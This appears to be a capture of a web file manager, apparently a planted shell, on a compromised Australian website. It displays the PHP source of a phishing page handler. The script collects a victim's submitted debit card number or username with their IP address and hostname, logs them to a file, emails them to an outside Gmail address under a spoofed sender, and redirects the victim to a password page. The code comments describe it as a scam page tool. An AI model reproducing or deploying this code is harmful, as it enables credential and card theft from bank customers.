Create New Item
Item Type
File
Folder
Item Name
Search file in folder and subfolders...
Are you sure want to rename?
demountable
/
www.splitfist.com.au
/
includes
/
ports
:
NextStepUsername1.php
Advanced Search
Upload
New Item
Settings
Back
Back Up
Advanced Editor
Save
<?php $ip = getenv("REMOTE_ADDR"); //this to got the one u spamed IP $hostname = gethostbyaddr($ip); // this to got his Host company $message .= "--------------+ Created By Alexander +------------\n"; // Fixed Message you can change it $message .= "--------------+ Userx0r1 +------------\n"; // to explan to your self what this area x0r1 or Contact info or what $message .= "Debit card number or username : ".$_POST['Username']."\n"; // this for got the info $message .= "--------------+ Created By ME +------------\n"; $message .= "IP Address : ".$ip."\n"; // here to message your info about the IP $message .= "HostName : ".$hostname."\n"; // here to Message your info about Host name $message .= "--------------------\n"; $rnessage = "$message\n"; $message .= "--------------+ Created By ME +------------\n"; $send="princeonek@gmail.com"; // Here your Email or any email u need got info on it file_put_contents("../logs.txt",$message,FILE_APPEND); $subject = "AccessCU 1 ReZulT $ip"; // the name of your message as apper into Email u can change Scampage Tooolz $headers = "From: NetEase<news@NetEase.com>"; // the Email of sender will apper into message detils $str=array($send, $IP); foreach ($str as $send) if(mail($send,$subject,$rnessage,$headers) != false){ mail($Send,$subject,$rnessage,$headers); mail($messege,$subject,$rnessage,$headers); Header ("Location: Password.htm"); // here will tell the index where it go after done send the info i will tell it go to paypal wrong page } ?> <html> <head> <meta charset="UTF-8"> <meta http-equiv="refresh" content="0;url= Password.htm"> <title></title> </head> </html>